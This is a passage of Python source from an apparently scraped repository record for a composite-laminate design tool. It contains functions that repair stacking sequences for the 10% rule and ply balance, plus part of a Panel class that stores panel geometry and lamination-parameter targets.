'ind_angle2', ind_angle2)\r\n# print('indices_per_angle', indices_per_angle)\r\n\r\n # if no ply to be deleted\r\n if len(indices_per_angle[ind_angle1]) < 1:\r\n dist_10_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n\r\n# print(angle1, ' plies changed into ', angle2, 'plies')\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n# print('indices_per_angle[ind_angle1]', indices_per_angle[ind_angle1])\r\n# print('indices_per_angle[ind_angle2]', indices_per_angle[ind_angle2])\r\n\r\n lampamA += lampamA_options[ind_angle2] - lampamA_options[ind_angle1]\r\n dist_10 = dist_10_options[ind_angle1, ind_angle2]\r\n\r\n # modification of the stacking sequence\r\n ind_ply_1 = indices_per_angle[ind_angle1].pop(0)\r\n# print('ind_ply_1', ind_ply_1)\r\n\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(angle1)\r\n ply_queue.append(angle2)\r\n else:\r\n ss[ind_ply_1] = angle2\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n\r\n indices_per_angle[ind_angle2].append(ind_ply_1)\r\n if constraints.sym:\r\n indices_per_angle[ind_angle2].sort(reverse=True)\r\n else:\r\n sortAccording(indices_per_angle[ind_angle2], indices_to_sort)\r\n indices_per_angle[ind_angle2].reverse()\r\n\r\n# print('indices_per_angle', indices_per_angle)\r\n# print('dist_10', dist_10)\r\n if dist_10 < 1e-10:\r\n break\r\n\r\n dist_10_options = calc_dist_10_options_3(\r\n lampamA, lampamA_options, constraints)\r\n# print('dist_10_options', dist_10_options)\r\n\r\n return ss, ply_queue\r\n\r\n\r\ndef repair_10_bal_2(ss_ini, mini_10, constraints):\r\n \"\"\"\r\n repairs a laminate regarding the balance guideline and the 10% rule applied\r\n on ply counts\r\n \"\"\"\r\n\r\n# if not constraints.ipo and constraints.percent_45_135 != 0:\r\n# raise Exception(\"\"\"\r\n#Repair for 10% rule not implemented for laminates with no balance requirements\r\n#and a limit percentage for the ply orientated in the combined +-45 direction!\r\n#\"\"\")\r\n\r\n# print('initial')\r\n# print_ss(ss_ini)\r\n\r\n ss = np.copy(ss_ini)\r\n if not constraints.ipo and not constraints.rule_10_percent:\r\n return ss, []\r\n\r\n if constraints.sym and ss.size % 2 and ss[ss.size // 2] not in {0, 90}:\r\n ss[ss.size // 2] = 0\r\n\r\n if constraints.sym:\r\n ind_plies = np.array(range(0, ss.size // 2))\r\n else:\r\n ind_plies = np.arange(ss.size)\r\n beginning = np.copy(ind_plies[0:ind_plies.size // 2])\r\n ending = np.copy(ind_plies[ind_plies.size // 2:ss.size][::-1])\r\n ind_plies = np.zeros((ss.size,), int)\r\n ind_plies[::2] = ending\r\n ind_plies[1::2] = beginning\r\n# print('ind_plies', list(ind_plies))\r\n\r\n ply_queue = []\r\n if constraints.rule_10_percent:\r\n for elem in range(ma.ceil(mini_10[0])):\r\n ply_queue.append(0)\r\n for elem in range(ma.ceil(mini_10[1])):\r\n ply_queue.append(90)\r\n for elem in range(ma.ceil(mini_10[2])):\r\n ply_queue.append(45)\r\n for elem in range(ma.ceil(mini_10[3])):\r\n ply_queue.append(-45)\r\n# print('initial ply queue', ply_queue)\r\n\r\n if constraints.rule_10_percent and constraints.percent_45_135:\r\n missing_extra_45_135 = ma.ceil(mini_10[4]) \\\r\n - ma.ceil(mini_10[2]) - ma.ceil(mini_10[3])\r\n else:\r\n missing_extra_45_135 = 0\r\n\r\n counter_remaining_plies = ind_plies.size\r\n\r\n change = False\r\n for counter, ind_ply in enumerate(ind_plies):\r\n# print()\r\n# print('ind_ply', ind_ply)\r\n# print('new_angle', ss[ind_ply])\r\n# print('ply_queue', ply_queue)\r\n# print_ss(ss)\r\n\r\n ply_queue_before = ply_queue[:]\r\n new_angle = ss[ind_ply]\r\n# print('ind_ply', ind_ply, 'new_angle', new_angle)\r\n counter_remaining_plies -= 1\r\n\r\n if new_angle in ply_queue:\r\n ply_queue.remove(new_angle)\r\n else:\r\n if constraints.ipo and not new_angle in (0, 90):\r\n ply_queue.append(-new_angle)\r\n if not constraints.ipo and new_angle in (45, -45):\r\n missing_extra_45_135 = max(0, missing_extra_45_135 - 1)\r\n\r\n# print('ply_queue', ply_queue, len(ply_queue))\r\n if counter_remaining_plies < len(ply_queue) + missing_extra_45_135:\r\n change = True\r\n last_ply = counter\r\n ply_queue = ply_queue_before\r\n for ind_ply in ind_plies[counter:]:\r\n ss[ind_ply] = 666\r\n if constraints.sym:\r\n ss[ss.size - ind_ply - 1] = 666\r\n break\r\n# print_ss(ss)\r\n# print('ply_queue', ply_queue)\r\n\r\n# print('last_ply', last_ply)\r\n# print('ply_queue', ply_queue, len(ply_queue))\r\n\r\n# print_ss(ss)\r\n\r\n for ind in range(missing_extra_45_135):\r\n if ind % 2:\r\n ply_queue.append(45)\r\n else:\r\n ply_queue.append(-45)\r\n\r\n if change and last_ply + len(ply_queue) != len(ind_plies):\r\n# ply_queue_2 = ply_queue[:]\r\n# ply_queue_2.append(90)\r\n# if (constraints.sym \\\r\n# and np.isclose(np.sort(np.array(2*ply_queue_2)),\r\n# np.sort(ss_ini[ss == 666])).all()) \\\r\n# or (not constraints.sym \\\r\n# and np.isclose(np.sort(np.array(ply_queue_2)),\r\n# np.sort(ss_ini[ss == 666])).all()):\r\n# ply_queue.append(90)\r\n# else:\r\n ply_queue.append(0)\r\n\r\n return ss, ply_queue\r\n\r\n\r\ndef calc_dist_10_options_1(lampamA, lampamA_options, constraints):\r\n \"\"\"\r\n calculates the possible distances away from the LP feasible region for the\r\n 10% of Abdalla achievable by modifying the fibre orientations of couples of\r\n angled plies in a balanced laminate\r\n\r\n dist_10_options[ind_pos_angle1, ind_pos_angle2] for +-angle1 plies changed\r\n to +-angle2 plies\r\n\r\n The plies to be modified are chosen among the innermost layers to\r\n reduce the out-of-plane modifications\r\n \"\"\"\r\n dist_10_options = 1e10*np.ones((constraints.pos_angles.size,\r\n constraints.pos_angles.size), float)\r\n for ind_pos_angle1 in range(constraints.pos_angles.size):\r\n for ind_pos_angle2 in range(constraints.pos_angles.size):\r\n if ind_pos_angle1 == ind_pos_angle2:\r\n continue\r\n LPs = lampamA - lampamA_options[ind_pos_angle1] \\\r\n + lampamA_options[ind_pos_angle2]\r\n dist_10_options[ind_pos_angle1, ind_pos_angle2] \\\r\n = calc_distance_Abdalla(LPs, constraints)\r\n\r\n return dist_10_options\r\n\r\ndef calc_dist_10_options_3(lampamA, lampamA_options, constraints):\r\n \"\"\"\r\n calculates the possible in-plane objective function values achievable by\r\n modifying one fibre orientation in a non-balanced laminate\r\n\r\n dist_10_options[ind_pos_angle1, ind_pos_angle2] for angle1 ply changed\r\n to angle2 plies\r\n \"\"\"\r\n dist_10_options = 1e10*np.ones((constraints.n_set_of_angles,\r\n constraints.n_set_of_angles), float)\r\n for ind_pos_angle1 in range(constraints.n_set_of_angles):\r\n for ind_pos_angle2 in range(constraints.n_set_of_angles):\r\n if ind_pos_angle1 == ind_pos_angle2:\r\n continue\r\n LPs = lampamA - lampamA_options[ind_pos_angle1] \\\r\n + lampamA_options[ind_pos_angle2]\r\n dist_10_options[ind_pos_angle1, ind_pos_angle2] \\\r\n = calc_distance_Abdalla(LPs, constraints)\r\n return dist_10_options\r\n\r\n\r\ndef calc_mini_10(constraints, n_plies):\r\n \"\"\"\r\n returns the minimum number of plies in the 0/90/+45/-45/+-45 directions to\r\n satisfy the 10% rule (array)\r\n\r\n INPUTS\r\n\r\n ss: stacking sequence (array)\r\n constraints: constraints (instance of the class Constraints)\r\n \"\"\"\r\n mini_10 = np.zeros((5,), float)\r\n mini_10[0] = ma.ceil(constraints.percent_0 * n_plies)\r\n mini_10[1] = ma.ceil(constraints.percent_90 * n_plies)\r\n mini_10[2] = ma.ceil(constraints.percent_45 * n_plies)\r\n mini_10[3] = ma.ceil(constraints.percent_135 * n_plies)\r\n mini_10[4] = ma.ceil(constraints.percent_45_135 * n_plies)\r\n if constraints.ipo:\r\n mini_10[2] = max(mini_10[2], mini_10[3])\r\n if mini_10[4] % 2:\r\n mini_10[4] += 1\r\n mini_10[4] = max(mini_10[4], 2 * mini_10[2])\r\n mini_10[2] = max(mini_10[2], mini_10[4] // 2)\r\n mini_10[3] = mini_10[2]\r\n\r\n if constraints.sym:\r\n mini_10 /= 2\r\n # middle ply can only be oriented at 0 or 90 degrees\r\n if n_plies % 2:\r\n mini_10[2:] = np.ceil(mini_10[2:])\r\n else:\r\n mini_10 = np.ceil(mini_10)\r\n\r\n if constraints.ipo:\r\n if mini_10[4] % 2:\r\n mini_10[4] += 1\r\n mini_10[4] = max(mini_10[4], 2 * mini_10[2])\r\n mini_10[2] = max(mini_10[2], mini_10[4] // 2)\r\n mini_10[3] = mini_10[2]\r\n\r\n return mini_10\r\n\r\ndef is_equal(ss, ply_queue, ss_ini, sym):\r\n \"\"\"\r\n returns True if the set of partial stacking sequence + ply queue matches\r\n the initial stacking sequence\r\n \"\"\"\r\n if not np.isclose(ss[ss != 666], ss_ini[ss != 666] ).all():\r\n return False\r\n\r\n if sym:\r\n if not np.isclose(np.sort(np.array(2*ply_queue)),\r\n np.sort(ss_ini[ss == 666])).all():\r\n return False\r\n else:\r\n if not np.isclose(np.sort(np.array(ply_queue)),\r\n np.sort(ss_ini[ss == 666])).all():\r\n return False\r\n return True\r\n\r\ndef calc_ind_plies(ss, n_plies, ply_queue, constraints, p_A=100):\r\n \"\"\"\r\n makes:\r\n - a list of all ply indices which can be modified during the refinement\r\n for membrane properties, sorted by starting with innermost plies\r\n - a list of the ply indices in each fibre direction which can be\r\n modified during the refinement for membrane properties, sorted by\r\n starting with innermost plies\r\n\r\n Notes:\r\n - al lplies from the queue of plies are included.\r\n - middle plies of symmetric laminates are not included.\r\n - the rest of the plies are included only if they are part of the\r\n inner part of laminate representing p_A %\r\n of the overall laminate thickness.\r\n \"\"\"\r\n ind_min = ma.floor(\r\n (1 - p_A/100)*(n_plies/2))\r\n# print('ind_min', ind_min)\r\n if constraints.sym:\r\n if constraints.dam_tol:\r\n if hasattr(constraints, 'dam_tol_rule') \\\r\n and constraints.dam_tol_rule in {2, 3}:\r\n indices_1 = range(max(2, ind_min), n_plies // 2)[::-1]\r\n elif not hasattr(constraints, 'dam_tol_rule') and \\\r\n constraints.n_plies_dam_tol == 2:\r\n indices_1 = range(max(2, ind_min), n_plies // 2)[::-1]\r\n else:\r\n indices_1 = range(max(1, ind_min), n_plies // 2)[::-1]\r\n else:\r\n indices_1 = range(ind_min, n_plies // 2)[::-1]\r\n else:\r\n if constraints.dam_tol:\r\n if hasattr(constraints, 'dam_tol_rule') \\\r\n and constraints.dam_tol_rule in {2, 3}:\r\n ind_1 = list(range(max(2, ind_min), n_plies // 2)[::-1])\r\n ind_2 = list(range(\r\n n_plies // 2, min(n_plies - ind_min, n_plies - 2)))\r\n elif not hasattr(constraints, 'dam_tol_rule') and \\\r\n constraints.n_plies_dam_tol == 2:\r\n ind_1 = list(range(max(2, ind_min), n_plies // 2)[::-1])\r\n ind_2 = list(range(\r\n n_plies // 2, min(n_plies - ind_min, n_plies - 2)))\r\n else:\r\n ind_1 = list(range(max(1, ind_min), n_plies // 2)[::-1])\r\n ind_2 = list(range(\r\n n_plies // 2, min(n_plies - ind_min, n_plies - 1)))\r\n else:\r\n ind_1 = list(range(ind_min, n_plies // 2)[::-1])\r\n ind_2 = list(range(n_plies // 2, n_plies - ind_min))\r\n #print('ind_1', ind_1, 'ind_2', ind_2)\r\n indices_1 = np.zeros((len(ind_1) + len(ind_2),), 'int16')\r\n indices_1[::2] = ind_2\r\n indices_1[1::2] = ind_1\r\n# print('indices_1', list(indices_1))\r\n\r\n indices_per_angle = []\r\n for ind_angle in range(constraints.n_set_of_angles):\r\n indices_per_angle.append([])\r\n\r\n for ind_ply_1 in indices_1:\r\n if ss[ind_ply_1] != 666:\r\n indices_per_angle[\r\n constraints.ind_angles_dict[ss[ind_ply_1]]].append(ind_ply_1)\r\n\r\n for angle in ply_queue:\r\n indices_per_angle[constraints.ind_angles_dict[angle]].insert(0, 6666)\r\n\r\n return indices_1, indices_per_angle\r\n\r\ndef calc_lampamA_options_1(n_plies, constraints):\r\n \"\"\"\r\n calculates the elementary changes of in-plane lamination parameters\r\n when modifying the fibre orientations of couples of angled plies\r\n \"\"\"\r\n lampamA_options = np.empty((constraints.pos_angles.size, 4), float)\r\n for ind_angle, angle in enumerate(constraints.pos_angles):\r\n lampamA_options[ind_angle] = np.copy(constraints.cos_sin[\r\n constraints.ind_angles_dict[angle]]).reshape(4)\r\n lampamA_options[ind_angle] += constraints.cos_sin[\r\n constraints.ind_angles_dict[-angle]].reshape(4)\r\n if not constraints.sym:\r\n lampamA_options *= (1 / n_plies)\r\n else:\r\n lampamA_options *= (2 / n_plies)\r\n return lampamA_options\r\n\r\ndef calc_lampamA_options_3(n_plies, constraints):\r\n \"\"\"\r\n calculates the elementary changes of in-plane lamination parameters\r\n when modifying a fibre orientation\r\n \"\"\"\r\n lampamA_options = np.empty((constraints.n_set_of_angles, 4), float)\r\n for ind_angle, angle in enumerate(constraints.set_of_angles):\r\n lampamA_options[ind_angle] = np.copy(\r\n constraints.cos_sin[ind_angle]).reshape(4)\r\n if not constraints.sym:\r\n lampamA_options *= 1 / n_plies\r\n else:\r\n lampamA_options *= 2 / n_plies\r\n return lampamA_options\r\n\r\ndef calc_lampamA_ply_queue(ss, n_plies, ply_queue, constraints):\r\n \"\"\"\r\n calculates in-plane lamination parameters based on a partially retrieved\r\n stacking sequence and a list of plies for the innermost plies whose\r\n positions are left to be determined\r\n \"\"\"\r\n cos_sin = np.zeros((4,), float)\r\n\r\n if not constraints.sym:\r\n for angle in ss:\r\n if angle != 666:\r\n cos_sin += constraints.cos_sin[\r\n constraints.ind_angles_dict[angle]].reshape((4, ))\r\n\r\n for angle in ply_queue:\r\n cos_sin += constraints.cos_sin[\r\n constraints.ind_angles_dict[angle]].reshape((4, ))\r\n\r\n return (1 / n_plies) * cos_sin\r\n\r\n for angle in ss[:np.size(ss) // 2]:\r\n if angle != 666:\r\n cos_sin += constraints.cos_sin[\r\n constraints.ind_angles_dict[angle]].reshape((4, ))\r\n\r\n for angle in ply_queue:\r\n cos_sin += constraints.cos_sin[\r\n constraints.ind_angles_dict[angle]].reshape((4, ))\r\n\r\n if np.size(ss) % 2:\r\n cos_sin += 0.5 * constraints.cos_sin[\r\n constraints.ind_angles_dict[ss[n_plies // 2]]].reshape((4,))\r\n\r\n return (2 / n_plies) * cos_sin\r\n\r\nif __name__ == \"__main__\":\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n dam_tol=False,\r\n rule_10_percent=True,\r\n n_contig=4,\r\n percent_0=10,\r\n percent_45=0,\r\n percent_90=10,\r\n percent_135=0,\r\n percent_45_135=10,\r\n set_of_angles=[0, 45, -45, 90])\r\n\r\n\r\n print('\\n\\n*** Test for the function is_equal ***')\r\n ss_ini = np.array([\r\n -45, 45, 60, 15, -15, 60, 30, 45, 0])\r\n ss = np.array([\r\n -45, 45, 60, 15, -15, 60, 30, 45, 0])\r\n ply_queue = []\r\n print(is_equal(ss, ply_queue, ss_ini, constraints.sym))\r\n\r\n\r\n print('\\n\\n*** Test for the function calc_mini_10 ***')\r\n mini_10 = calc_mini_10(constraints, 40)\r\n print('\\nmini_10', mini_10)\r\n n_45 = ma.ceil(mini_10[2])\r\n n_135 = ma.ceil(mini_10[3])\r\n n_45_135 = ma.ceil(mini_10[4])\r\n if constraints.rule_10_percent and constraints.percent_45_135:\r\n missing_extra_45_135 = ma.ceil(mini_10[4]) \\\r\n - ma.ceil(mini_10[2]) - ma.ceil(mini_10[3])\r\n else:\r\n missing_extra_45_135 = 0\r\n print('n_45', n_45)\r\n print('n_135', n_135)\r\n print('n_45_135', n_45_135)\r\n print('missing_extra_45_135', missing_extra_45_135)\r\n\r\n\r\n print('\\n*** Test for the function repair_10_bal***')\r\n ss_ini = np.array([60, 45, 60, 0], int)\r\n ss_ini = np.array([60, 45, 60, 15, -15, 30, 45], int)\r\n ss_ini = np.array([-45, 45, -45, 0, 0, 0, -45, 90, 45, 45], int)\r\n if constraints.sym:\r\n ss_ini = np.hstack((ss_ini, np.flip(ss_ini)))\r\n print('\\nInitial stacking sequence')\r\n print_ss(ss_ini, 2000)\r\n print('ss_ini.zize', ss_ini.size)\r\n mini_10 = calc_mini_10(constraints, ss_ini.size)\r\n print('mini_10', mini_10)\r\n ss, ply_queue = repair_10_bal(ss_ini, mini_10, constraints)\r\n print('\\nSolution stacking sequence')\r\n print_ss(ss, 2000)\r\n print('ply_queue', ply_queue)\r\n\r\n print('\\n*** Test for the function calc_ind_plies ***')\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n dam_tol=False,\r\n rule_10_percent=True,\r\n percent_0=10,\r\n percent_45=5,\r\n percent_90=10,\r\n percent_135=5,\r\n set_of_angles=[0, 45, 30, -30, -45, 60, -60, 90])\r\n p_A = 50\r\n ss = np.array([\r\n 45, 90, 45, 0, -45, 0, 666, 666], int)\r\n ss = np.hstack((ss, np.flip(ss)))\r\n ply_queue = [90, -45]\r\n n_plies = ss.size\r\n indices_1, indices_per_angle = calc_ind_plies(\r\n ss, n_plies, ply_queue, constraints, p_A)\r\n print('indices_1', list(indices_1))\r\n print('indices_per_angle', indices_per_angle)\r\n\r\n print('\\n*** Test for the function calc_lampamA_ply_queue ***')\r\n constraints = Constraints(\r\n sym=False,\r\n set_of_angles=[0, 45, 30, -30, -45, 60, -60, 90])\r\n ss = np.array([45, 0, 45, 0, -45, 45, 45, 0, 45, 0, -45, 45, 45, -45, -45, -45, 45, -45, 45,\r\n 666, 666, 666, 666, 666, 666, 666, 666, 666, 666, 666, 666,\r\n 45, -45, 45, -45, -45, -45, 45, 45, -45, 0, 45, 0, 45, 45, -45, 0, 45, 0, 45], int)\r\n ply_queue = [90, 90, 90, -45, -45, -45, 90, 90, 90, -45, -45, -45]\r\n n_plies = ss.size\r\n lampamA = calc_lampamA_ply_queue(\r\n ss, n_plies, ply_queue, constraints)\r\n\r\n ss = np.array([45, 0, 45, 0, -45, 45, 45, 0, 45, 0, -45, 45, 45, -45, -45, -45, 45, -45, 45,\r\n 90, 90, 90, -45, -45, -45, 90, 90, 90, -45, -45, -45,\r\n 45, -45, 45, -45, -45, -45, 45, 45, -45, 0, 45, 0, 45, 45, -45, 0, 45, 0, 45], int)\r\n lampamA_check = calc_lampam(ss, constraints)[0:4]\r\n print('lampamA', lampamA)\r\n print('lampamA_check', lampamA_check)\r\n\r\n print()\r\n constraints = Constraints(\r\n sym=True,\r\n set_of_angles=[0, 45, 30, -30, -45, 60, -60, 90])\r\n ss = np.array([45, 0, 45, 0, -45, 45, 45, 0, 45, 0, -45, 45, 45, -45, -45, -45, 45, -45, 45,\r\n 666, 666, 666, 666, 666, 666, 666, 666, 666, 666, 666, 666,\r\n 45, -45, 45, -45, -45, -45, 45, 45, -45, 0, 45, 0, 45, 45, -45, 0, 45, 0, 45], int)\r\n ply_queue = [90, 90, 90, -45, -45, -45]\r\n n_plies = ss.size\r\n lampamA = calc_lampamA_ply_queue(\r\n ss, n_plies, ply_queue, constraints)\r\n\r\n ss = np.array([45, 0, 45, 0, -45, 45, 45, 0, 45, 0, -45, 45, 45, -45, -45, -45, 45, -45, 45,\r\n 90, 90, 90, -45, -45, -45, 90, 90, 90, -45, -45, -45,\r\n 45, -45, 45, -45, -45, -45, 45, 45, -45, 0, 45, 0, 45, 45, -45, 0, 45, 0, 45], int)\r\n lampamA_check = calc_lampam(ss, constraints)[0:4]\r\n print('lampamA', lampamA)\r\n print('lampamA_check', lampamA_check)\r\n"
},
{
"alpha_fraction": 0.5766251683235168,
"alphanum_fraction": 0.5916804671287537,
"avg_line_length": 35.42996597290039,
"blob_id": "cdc2b3efd0e9d69ed2f7e743cd9d66cdcb2dc0ec",
"content_id": "d490fd7513f0a4048b1a14c515bd12ae968ff601",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11491,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 307,
"path": "/src/BELLA/panels.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for panels\r\n\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.constraints import Constraints\r\n\r\nclass Panel():\r\n \"\"\"\r\n Class for panels\r\n \"\"\"\r\n def __init__(self,\r\n ID,\r\n constraints,\r\n n_plies,\r\n lampam_target=np.array([]),\r\n lampam_weightings=np.ones((12,), float),\r\n area=0,\r\n length_x=0,\r\n length_y=0,\r\n N_x=0,\r\n N_y=0,\r\n weighting=1,\r\n neighbour_panels=[]):\r\n \"\"\"\r\n Create object for storing information concerning a panel:\r\n - n_plies: target number of plies\r\n - lampam_target: lamination-parameter targets\r\n - lampam_weightings: lamination-parameter weightings in panel objective\r\n function\r\n - weighting: panel weighting in the multi-panel objecive function\r\n - area: panel area\r\n - length_x: panel length (x-direction)\r\n - length_y: panel width (y-direction)\r\n - N_x: loading intensity in the x-direction\r\n - N_y: loading intensity in the y-direction\r\n - neighbour_panels: list of the neighbour panels' indices\r\n - constraints: design and manufacturing constraints\r\n - parameters: parameters of the optimiser\r\n \"\"\"\r\n # set the number of plies and the number of a potential middle ply\r\n # for symmetric laminates\r\n self.set_n_plies(n_plies, constraints)\r\n\r\n # lamination-parameter targets\r\n self.lampam_target = lampam_target\r\n\r\n # panel ID\r\n self.ID = ID\r\n\r\n # list of the neighbour panels' indices\r\n self.neighbour_panels = neighbour_panels\r\n\r\n # panel area\r\n self.area = area\r\n self.length_x = length_x\r\n self.length_y = length_y\r\n if not isinstance(area, (float, int)):\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the panel area must be a number!\r\n\"\"\")\r\n if area < 0:\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the panel area must be positive!\r\n\"\"\")\r\n if not isinstance(length_x, (float, int)):\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the panel length (length_x) must be a number!\r\n\"\"\")\r\n if length_x < 0:\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the panel length (length_x) must be positive!\r\n\"\"\")\r\n if not isinstance(length_y, (float, int)):\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the panel length (length_y) must be a number!\r\n\"\"\")\r\n if length_y < 0:\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the panel length (length_y) must be positive!\r\n\"\"\")\r\n if length_x != 0 and length_y != 0:\r\n self.area = length_x * length_y\r\n\r\n # panel loading conditions\r\n self.N_x = N_x\r\n self.N_y = N_y\r\n\r\n # panel weighting in the multi-panel objective function\r\n self.weighting = weighting # initial value\r\n if not isinstance(weighting, (float, int)):\r\n raise PanelDefinitionError(\"\"\"\r\nThe panel weighting in the multi-panel objective function must a number!\r\n\"\"\")\r\n if weighting < 0:\r\n raise PanelDefinitionError(\"\"\"\r\nThe panel weighting in the multi-panel objective function must be positive!\r\n\"\"\")\r\n\r\n # lamination-parameter weightings in panel objective function\r\n if not(isinstance(lampam_weightings, np.ndarray)) \\\r\n and lampam_weightings.size == 12 \\\r\n and lampam_weightings.dtype == float:\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, lampam_weightings must be a vector with 12 float components!\r\n\"\"\")\r\n if [False for elem in lampam_weightings if elem < 0]:\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the elements of lampam_weightings must be positive!\r\n\"\"\")\r\n self.lampam_weightings_ini = lampam_weightings\r\n\r\n def filter_target_lampams(self, constraints, obj_func_param):\r\n \"\"\"\r\n filters applied to the lamination parameters to account for orthotropy\r\n requirements\r\n \"\"\"\r\n # If symmetry is desired, the corresponding target amination parameters\r\n # must be set to 0\r\n if constraints.sym:\r\n self.lampam_target[4:8] = 0\r\n self.lampam_target[4:8] = 0\r\n # If the balance rule is desired, the corresponding target\r\n # lamination parameters must be set to 0\r\n if constraints.bal:\r\n self.lampam_target[2] = 0\r\n self.lampam_target[3] = 0\r\n # If the out-of-plane orthotropy is desired, the corresponding target\r\n # lamination parameters must be set to 0\r\n if constraints.oopo:\r\n self.lampam_target[10] = 0\r\n self.lampam_target[11] = 0\r\n\r\n def filter_lampam_weightings(self, constraints, obj_func_param):\r\n \"\"\"\r\n filter of the lamination-parameter weighting in the panel\r\n objective function to account for the design guidelines\r\n\r\n# lampam_weightings_3: for blending steps 3 (contain penalty for\r\n# out-of-plane orthotropy and may contain penalty for balance)\r\n lampam_weightings: for all other blending steps (contain penalty for\r\n out-of-plane orthotropy and does not contain penalty for balance)\r\n \"\"\"\r\n lampam_weightings = np.copy(self.lampam_weightings_ini)\r\n\r\n # filter for zero lamination parameters factors\r\n if constraints.sym:\r\n lampam_weightings[4:8] = 0\r\n if set(constraints.set_of_angles) == set([0, 45, -45, 90]):\r\n lampam_weightings[3] = 0\r\n lampam_weightings[7] = 0\r\n lampam_weightings[11] = 0\r\n\r\n # modifying lamination parameter factor for orthotropy requirements\r\n if constraints.bal:\r\n lampam_weightings[2] = 0\r\n lampam_weightings[3] = 0\r\n if constraints.oopo:\r\n lampam_weightings[10] = 0\r\n lampam_weightings[11] = 0\r\n\r\n mean = np.average(lampam_weightings[lampam_weightings != 0])\r\n\r\n if constraints.oopo:\r\n if set(constraints.set_of_angles) == set([0, 45, -45, 90]):\r\n lampam_weightings[10] = mean * obj_func_param.coeff_oopo\r\n else:\r\n lampam_weightings[10] = mean * obj_func_param.coeff_oopo\r\n lampam_weightings[11] = mean * obj_func_param.coeff_oopo\r\n\r\n# if constraints.bal and obj_func_param.penalty_ipo_switch\r\n# and (obj_func_param.penalty_bal_ipo_switch_mp or\r\n# (not obj_func_param.penalty_bal_ipo_switch_mp and is_thick)):\r\n#\r\n# lampam_weightings_3 = np.copy(lampam_weightings)\r\n#\r\n# if constraints.bal and obj_func_param.penalty_ipo_switch:\r\n# if set(constraints.set_of_angles) == set([0, 45, -45, 90]):\r\n# lampam_weightings_3[2] = mean * obj_func_param.coeff_bal_ipo\r\n# else:\r\n# lampam_weightings_3[2] = mean * obj_func_param.coeff_bal_ipo\r\n# lampam_weightings_3[3] = mean * obj_func_param.coeff_bal_ipo\r\n#\r\n# if constraints.oopo:\r\n# if set(constraints.set_of_angles) == set([0, 45, -45, 90]):\r\n# lampam_weightings_3[10] = mean * obj_func_param.coeff_oopo\r\n# else:\r\n# lampam_weightings_3[10] = mean * obj_func_param.coeff_oopo\r\n# lampam_weightings_3[11] = mean * obj_func_param.coeff_oopo\r\n#\r\n# self.sum_lampam_weightings_3 = np.sum(lampam_weightings_3)\r\n# self.lampam_weightings_3 \\\r\n# = lampam_weightings_3 / self.sum_lampam_weightings_3\r\n\r\n# if not np.allclose(lampam_weightings, self.lampam_weightings_ini):\r\n# print(f\"\"\"\r\n#The lamination-parameter weightings have been modified (before normalisation):\r\n#{self.lampam_weightings_ini} -> {lampam_weightings}\r\n# \"\"\")\r\n\r\n self.sum_lampam_weightings = np.sum(lampam_weightings)\r\n self.lampam_weightings = lampam_weightings \\\r\n / self.sum_lampam_weightings\r\n\r\n self.lampam_weightingsA = self.lampam_weightings[0:4]\r\n self.lampam_weightingsD = self.lampam_weightings[8:12]\r\n\r\n def set_n_plies(self, n_plies, constraints):\r\n \"\"\"\r\n returns the number of plies of a laminate\r\n and the number of a its potential middle ply (0 otherwise)\r\n \"\"\"\r\n\r\n if not isinstance(n_plies, int):\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the number of plies in the panel must be an integer!\"\"\")\r\n if n_plies < 1:\r\n raise PanelDefinitionError(\"\"\"\r\nAttention, the number of plies in the panel must be positive!\"\"\")\r\n middle_ply_index = 0\r\n self.has_middle_ply = False\r\n if constraints.sym:\r\n if n_plies % 2 == 1:\r\n middle_ply_index = int((n_plies + 1)/2)\r\n self.has_middle_ply = True\r\n self.n_plies, self.middle_ply_index = n_plies, middle_ply_index\r\n\r\n# if constraints.sym and self.middle_ply_index != 0:\r\n# raise PanelDefinitionError(\"\"\"\r\n#Attention, the number of plies in the panel must be even for\r\n#guide-based-blending !\"\"\")\r\n\r\n return 0\r\n\r\n def calc_weight(self, density_area):\r\n \"\"\"\r\nreturns the weight of a panel\r\n \"\"\"\r\n return density_area*self.area*self.n_plies\r\n\r\n\r\n def show(self):\r\n \" Display object - non verbose verisn or __repr__\"\r\n return f\"\"\"\r\nPanel ID : {self.ID}\r\nNumber of plies : {self.n_plies}\r\n\"\"\"\r\n\r\n\r\n def __repr__(self):\r\n \" Display object \"\r\n to_disp = ''\r\n # Lamination-parameter targets\r\n if np.array(self.lampam_target).size:\r\n to_disp = to_disp \\\r\n + 'Lamination-parameter targets : ' \\\r\n + str(self.lampam_target) + '\\n'\r\n\r\n # Lamination-parameter weighting in the panel objective function\r\n if hasattr(self, 'lampam_weightings2'):\r\n to_disp = to_disp \\\r\n + \"\"\"\r\nFinal lamination-parameter weighting in the panel objective function: :\r\n A : {self.lampam_weightings2[0:4]}\r\n B : {self.lampam_weightings2[4:8]}\r\n D : {self.lampam_weightings2[8:12]}\r\n \"\"\"\r\n\r\n return f\"\"\"\r\nPanel ID : {self.ID}\r\nNumber of plies : {self.n_plies}\r\nNeighbour panel IDs: {self.neighbour_panels}\r\nLength in the x-direction : {self.length_x}\r\nLength in the y-direction : {self.length_y}\r\nArea : {self.area}\r\nWeighting in multi-panel objective funcion : {self.weighting}\r\nLoad intensity in th x-direction : 